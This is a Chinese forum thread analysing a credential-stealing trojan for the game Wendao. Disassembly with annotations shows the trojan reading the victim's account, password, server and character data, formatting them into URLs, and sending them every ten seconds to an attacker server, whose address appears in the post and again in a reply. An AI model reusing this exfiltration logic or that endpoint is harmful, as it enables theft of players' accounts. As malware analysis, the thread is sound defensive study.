07A61320 |.  C705 D867A607 01>mov dword ptr ds:,1                   ; |
07A6132A |.  8935 D467A607 mov dword ptr ds:,esi                ; |
07A61330 |.  E8 35210000    call <jmp.&MSVCRT.memset>                      ; \memset
07A61335 |.  6A 20          push 20                                        ; /n = 20 (32.)
07A61337 |.  56             push esi                                     ; |c => 00
07A61338 |.  68 F866A607    push ksuser.07A666F8                         ; |s = ksuser.07A666F8
07A6133D |.  E8 28210000    call <jmp.&MSVCRT.memset>                      ; \memset
07A61342 |.  6A 08          push 8                                        ; /n = 8
07A61344 |.  56             push esi                                     ; |c => 00
07A61345 |.  68 3867A607    push ksuser.07A66738                         ; |s = ksuser.07A66738
07A6134A |.  E8 1B210000    call <jmp.&MSVCRT.memset>                      ; \memset
07A6134F |.  83C4 2C       add esp,2C
07A61352 |.  E8 631A0000    call ksuser.07A62DBA //关键call 3
07A61357 |.  3935 C46CA607 cmp dword ptr ds:,esi
07A6135D |.  75 15          jnz short ksuser.07A61374
07A6135F |.  56             push esi                                     ; /pThreadId => NULL
07A61360 |.  56             push esi                                     ; |CreationFlags => 0
07A61361 |.  56             push esi                                     ; |pThreadParm => NULL
07A61362 |.  68 F62DA607    push ksuser.07A62DF6                         ; |ThreadFunction = ksuser.07A62DF6 线程函数5
07A61367 |.  56             push esi                                     ; |StackSize => 0
07A61368 |.  56             push esi                                     ; |pSecurity => NULL
07A61369 |.  FF15 7440A607 call dword ptr ds:[<&KERNEL32.CreateThread>] ; \CreateThread
07A6136F |.  A3 C46CA607    mov dword ptr ds:,eax
07A61374 |>  61             popad
07A61375 |.  5F             pop edi
07A61376 |.  5E             pop esi
07A61377 |.  5B             pop ebx
07A61378 |.  C9             leave
07A61379 \.  C3             retn跟进关键call 307A62DBA /$  55             push ebp
07A62DBB |.  8BEC          mov ebp,esp
07A62DBD |.  81EC 04010000 sub esp,104
07A62DC3 |.  FF35 D867A607 push dword ptr ds:                   ; /<%d> = 2
07A62DC9 |.  8D85 FCFEFFFF lea eax,                            ; |
07A62DCF |.  68 7866A607    push ksuser.07A66678                         ; |<%s> = "testli" //这里发现了盗取的游戏账号，所以可以判断第一个patch点是读取游戏账号
07A62DD4 |.  68 286AA607    push ksuser.07A66A28                         ; |<%s> = "http://b**12.ju888.com:55002/001/mibaolm.asp" //发信地址
07A62DD9 |.  68 F854A607    push ksuser.07A654F8                         ; |%s?act=getpos&d10=%s&pos=&d80=%d
07A62DDE |.  50             push eax                                     ; |s
07A62DDF |.  FF15 E440A607 call dword ptr ds:[<&MSVCRT.sprintf>]          ; \sprintf
07A62DE5 |.  8D85 FCFEFFFF lea eax,
07A62DEB |.  50             push eax
07A62DEC |.  E8 A1F7FFFF    call ksuser.07A62592
07A62DF1 |.  83C4 18       add esp,18
07A62DF4 |.  C9             leave
07A62DF5 \.  C3             retn线程函数507A62DF6 > /68 10270000    push 2710                                     ; /Timeout = 10000. ms
07A62DFB . |FF15 8040A607 call dword ptr ds:[<&KERNEL32.Sleep>]          ; \Sleep
07A62E01 . |E8 B4FFFFFF    call ksuser.07A62DBA //这个call的地址是07A62DBA，就是上面函数call 3，原来盗取的游戏信息每隔一段时间发送
07A62E06 .^\EB EE          jmp short ksuser.07A62DF6 //往上跳转，每隔10000. ms循环一次发现游戏密码123456的处理07A6137A    /.  55             push ebp
07A6137B    |.  8BEC          mov ebp,esp
07A6137D    |.  51             push ecx
07A6137E    |.  53             push ebx
07A6137F    |.  56             push esi
07A61380    |.  57             push edi
07A61381    |.  60             pushad
07A61382    |.  8945 FC       mov ,eax
07A61385    |.  FF75 FC       push                               ; /src
07A61388    |.  68 9866A607    push ksuser.07A66698                         ; |123456 //游戏密码123456
07A6138D    |.  E8 E4200000    call <jmp.&MSVCRT.strcpy>                      ; \strcpy
07A61392    |.  59             pop ecx
07A61393    |.  59             pop ecx
07A61394    |.  61             popad
07A61395    |.  5F             pop edi
07A61396    |.  5E             pop esi
07A61397    |.  5B             pop ebx
07A61398    |.  C9             leave
07A61399    \.  C3             retn发现游戏账号信息的处理07A62C9E    |> \FF75 FC       push                               ; /<%d>
07A62CA1    |.  8D85 5CFFFFFF lea eax,                            ; |
07A62CA7    |.  8B3D E440A607 mov edi,dword ptr ds:[<&MSVCRT.sprintf>]       ; |msvcrt.sprintf
07A62CAD    |.  BB 8454A607    mov ebx,ksuser.07A65484                      ; |%s?d00=%s&d01=%s&d10=%s&d11=%s&d20=%s&d21=%s&d22=%s&d30=%s&d32=%s&d40=%s&d42=%s&d45=%s&d50=%s&d70=%d&Para=%s&d90=%d%s?act=getpos&d10=%s&pos=&d80=%d
07A62CB2    |.  68 286CA607    push ksuser.07A66C28                         ; |001E2
07A62CB7    |.  FF35 D467A607 push dword ptr ds:                   ; |<%d> = 0
07A62CBD    |.  68 A067A607    push ksuser.07A667A0                         ; |<%s> = ""
07A62CC2    |.  68 8067A607    push ksuser.07A66780                         ; |<%s> = ""
07A62CC7    |.  68 6067A607    push ksuser.07A66760                         ; |<%s> = ""
07A62CCC    |.  68 4067A607    push ksuser.07A66740                         ; |<%s> = ""
07A62CD1    |.  56             push esi                                     ; |<%s>
07A62CD2    |.  68 1867A607    push ksuser.07A66718                         ; |testsafe
07A62CD7    |.  50             push eax                                     ; |<%s>
07A62CD8    |.  8D45 DC       lea eax,                            ; |
07A62CDB    |.  68 D866A607    push ksuser.07A666D8                         ; |<%s> = ""
07A62CE0    |.  50             push eax                                     ; |<%s>
07A62CE1    |.  8D85 DCFEFFFF lea eax,                            ; |
07A62CE7    |.  50             push eax                                     ; |<%s>
07A62CE8    |.  68 7866A607    push ksuser.07A66678                         ; |testlining
07A62CED    |.  68 5866A607    push ksuser.07A66658                         ; |黄鹤楼
07A62CF2    |.  68 3866A607    push ksuser.07A66638                         ; |电信一区
07A62CF7    |.  68 2868A607    push ksuser.07A66828                         ; |http://b12.ju888.com:55002/001/post.asp23C506959B78343A74D63CE236F3FE0829BB48
07A62CFC    |.  8D85 DCFAFFFF lea eax,                            ; |
07A62D02    |.  53             push ebx                                     ; |format => "%s?d00=%s&d01=%s&d10=%s&d11=%s&d20=%s&d21=%s&d22=%s&d30=%s&d32=%s&d40=%s&d42=%s&d45=%s&d50=%s&d70=%d&Para=%s&d90=%d"
07A62D03    |.  50             push eax                                     ; |s
07A62D04    |.  FFD7          call edi                                     ; \sprintf  //连接读取的游戏信息观察下这段内存，发现木马申请的内存存放的游戏账号信息07A66618  01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ...............
07A66628  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66638  B5 E7 D0 C5 D2 BB C7 F8 00 00 00 00 00 00 00 00  电信一区........//游戏大区
07A66648  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66658  BB C6 BA D7 C2 A5 00 00 00 00 00 00 00 00 00 00  黄鹤楼..........//服务器
07A66668  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66678  74 65 73 74 6C 69 00 00 00 00 00 00 00 00 00 00  testli..........//账号
07A66688  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66698  31 32 33 34 35 36 00 00 00 00 00 00 00 00 00 00  123456..........//密码
07A666A8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A666B8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A666C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A666D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A666E8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A666F8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66708  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66718  74 65 73 74 73 61 66 65 00 00 00 00 00 00 00 00  testsafe........//角色名
07A66728  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66738  31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  1...............//等级
07A66748  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66758  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................//下面应该是金钱之类的信息
07A66768  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66778  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66788  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66798  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A667A8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A667B8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A667C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A667D8  02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ...............
07A667E8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A667F8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66808  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66818  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
07A66828  68 74 74 70 3A 2F 2F 62 31 32 2E 6A 75 38 38 38  http://b12.ju888//发信地址
07A66838  2E 63 6F 6D 3A 35 35 30 30 32 2F 30 30 31 2F 70  .com:55002/001/p
07A66848  6F 73 74 2E 61 73 70 00 32 33 43 35 30 36 39 35  ost.asp.23C50695
07A66858  39 42 37 38 33 34 33 41 37 34 44 36 33 43 45 32  9B78343A74D63CE2
07A66868  33 36 46 33 46 45 30 38 32 39 42 42 34 38 00 00  36F3FE0829BB48..使用了套接字的函数，用来发送盗取后的信息。这个代码的上面一部分代码比较长不贴过来了，主要是封包处理，账号信息处理。07A628D0    |.  6A 00          push 0                                        ; /Flags = 0
07A628D2    |.  56             push esi                                     ; |DataSize
07A628D3    |.  53             push ebx                                     ; |Data
07A628D4    |.  FF75 F8       push                               ; |Socket
07A628D7    |.  FF15 5C41A607 call dword ptr ds:[<&WS2_32.#19>]             ; \send
07A628DD    |.  83F8 FF       cmp eax,-1
07A628E0    |.  75 04          jnz short ksuser.07A628E6
07A628E2    |.  33F6          xor esi,esi
07A628E4    |.  EB 39          jmp short ksuser.07A6291F
07A628E6    |>  80A5 D0F7FFFF 00 and byte ptr ss:,0
07A628ED    |.  B9 FF000000    mov ecx,0FF
07A628F2    |.  33C0          xor eax,eax
07A628F4    |.  8DBD D1F7FFFF lea edi,dword ptr ss:
07A628FA    |.  F3:AB          rep stosd
07A628FC    |.  66:AB          stosw
07A628FE    |.  33F6          xor esi,esi
07A62900    |.  AA             stosb
07A62901    |.  56             push esi                                     ; /Flags => 0
07A62902    |.  8D85 D0F7FFFF lea eax,                            ; |
07A62908    |.  68 00040000    push 400                                     ; |BufSize = 400 (1024.)
07A6290D    |.  50             push eax                                     ; |Buffer
07A6290E    |.  FF75 F8       push                               ; |Socket
07A62911    |.  FF15 6041A607 call dword ptr ds:[<&WS2_32.#16>]             ; \recv
07A62917    |.  83F8 FF       cmp eax,-1
07A6291A    |.  75 03          jnz short ksuser.07A6291F
07A6291C    |.  6A 01          push 1
07A6291E    |.  5E             pop esi
07A6291F    |>  FF75 F8       push                               ; /Socket
07A62922    |.  FF15 7441A607 call dword ptr ds:[<&WS2_32.#3>]             ; \closesocket
07A62928    |.  8BC6          mov eax,esi
07A6292A    |>  5F             pop edi
07A6292B    |.  5E             pop esi
07A6292C    |.  5B             pop ebx
07A6292D    |.  C9             leave
07A6292E    \.  C3             retn还能看见这个字符，%s%s%s_%d.jpg，估计还有对截图或者密保卡之类的图片处理。简单分析至此吧，还请朋友们多多指教。
病毒样本解压密码ggsafe

aliuwr 发表于 2010-7-20 10:09:05

不错,赞一个

bianfeng 发表于 2010-7-21 09:15:19

不错,学习了

Moheart 发表于 2010-7-21 10:49:17

先回帖再慢慢看~~~

paulbaby3000 发表于 2010-7-22 01:34:34

问道用什么游戏保护的？怎么会随便被木马修改游戏代码，也不提示的？

aaaaaa 发表于 2010-7-24 13:48:16

http://b12.ju888.com:55002/001/post.asp

akarus 发表于 2010-7-30 01:55:49

学习一下

profmit 发表于 2010-8-6 13:23:40

- - 游戏没任何保护密码用DES加密

profmit 发表于 2010-8-6 13:24:41

- - 电子矩阵密保

nbw 发表于 2010-8-7 09:32:57

分析的不错。楼主的这个木马是从一个挂马下载点下载的吧？能把下载链接给说下么？

gdfgdfr 发表于 2010-8-31 11:01:40

xz现在问道的内存读不出来密码了
看了上面的分析。
没看出来
07A61388 |. 68 9866A607 push ksuser.07A66698 ; |123456 //游戏密码123456

这个是从那来的啊

qiang 发表于 2010-9-26 10:04:43

回复 10# nbw

当时没有记录下载点，就算记录下来了，估计也无效了。
密码和其他信息保存在是在起始为07A66638的地址里面。

522586971 发表于 2011-4-22 22:03:21

很好的分析。学习一下。。

情深发表于 2011-4-29 21:01:00

下载下来，分析分析

情深发表于 2011-6-13 15:25:14

下载回去研究研究

页: [1]

一蓑烟雨论坛's Archiver

一个《问道》游戏盗号木马简单分析